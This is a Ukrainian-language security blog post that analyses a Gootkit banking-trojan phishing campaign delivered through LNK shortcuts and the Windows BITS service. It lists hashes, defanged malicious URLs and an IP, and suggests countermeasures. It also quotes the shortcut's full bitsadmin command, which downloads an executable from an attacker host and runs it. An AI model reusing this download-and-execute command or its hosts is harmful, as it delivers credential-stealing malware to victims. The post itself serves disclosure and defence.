IOC_LNK_BITS_130318

Доброго дня, панове.

Сьогодні було зафіксовано розсилку #Gootkit. (банківський троян)

Зразки були взяті з  myonlinesecurity.co.uk

Рівень загрози – високий.

Причина – застосування .LNK файлів та служби BITS в якості доставки.

Використання BITS далеко не новий спосіб (червень 16го та березень 17го)

Проте досить дієвий, оскільки мережева активність іде від імені системного процесу SVCHOST, якому як правило кисень не перекривають.

У поєднанні із застосуванням файлів-ярликів отримуємо спрацювання у більшості інфраструктур.

Користувачі захисту кінцевих точок McAfee (VSE/ENS) зверніть увагу – LNK файл детектиться по DAT, а payload – по GTI:

Трохи аналітики:

  • Доставка через .LNK файли в архіві
  • Завантаження основної частини – через SVCHOST (служба BITS)
  • Запуск шкідливого коду не потребує прав Адміністратора
  • Спроб закріплення не проводив
  • Даний тип ШПЗ застосовується для крадіжки облікових даних ДБО

Схема атаки:

email > URL > ZIP > LNK (BITS_URL) > SVCHOST GET from URL > %TEMP%\YtBvBnBv.exe

Маркери IOC:

архів:

SHA-256        1334628b3ad9da31e48a858430b648ac8b4ba128fe513cbab6e596d585a52ef3
File name   Invoice.zip
File size      1.01 KB

ярлик:

SHA-256    7363fde9c6ff4c78e1c7dd6b79acfc4e43db8a4f34458df4d004eb75dca0b549
File name   Invoice_March.lnk
File size      2.36 KB

Основна частина:

SHA-256        77eb662bfe5b638e72101713363a9f10549671ab35e8f70cd7f0b54179cd0ad6
File name   PriNtrBvF.exe >> %TEMP%\YtBvBnBv.exe
File size      252 KB

Мережеві IOC:

Завантаження архіву

h11ps:\\petpalsmarket{.} com/Invoice_March.zip

Завантаження основної частини

176.32.230.29    its-in-transit.co.uk       HEAD /PriNtrBvF.exe User-Agent: Microsoft BITS/7.5
176.32.230.29    its-in-transit.co.uk       GET /PriNtrBvF.exe User-Agent: Microsoft BITS/7.5

Активність по процесам:

Зміст ярлика:

Invoice_March.lnk

obj:

%ComSpec% /c "bitsadmin /transfer haizenetrstr /priority foreground 
h11p:\\its-in-transit.co{.} uk/PriNtrBvF.exe %TEMP%\YtBvBnBv.exe 
> NUL & start %TEMP%\YtBvBnBv.exe"

Активація LNK призводить до наступних кроків:

"C:\Windows\System32\cmd.exe" /c "bitsadmin /transfer haizenetrstr /priority foreground h11p:\its-in-transit.co{.} uk/PriNtrBvF.exe C:\tmp\YtBvBnBv.exe > NUL & start C:\tmp\YtBvBnBv.exe"

bitsadmin  /transfer haizenetrstr /priority foreground h11p:\its-in-transit.co{.} uk/PriNtrBvF.exe C:\tmp\YtBvBnBv.exe 

C:\tmp\YtBvBnBv.exe

Контрзаходи:

  • Блокування завантажень з мережі Інтернет через службу BITS (User-Agent: Microsoft BITS/xx)
  • Посилена фільтрація запускних, *.LNK та *.URL файлів по каналам Web та Email
  • Заборона створення та зчитування *.LNK та *.URL файлів в профілі користувача -див. приклад користувацького правила Access Protection

  • Заборона створення та зчитування/запуску *.EXE з каталогів профілю користувача %appdata%, а не лише у %temp% !
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

Tags: , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: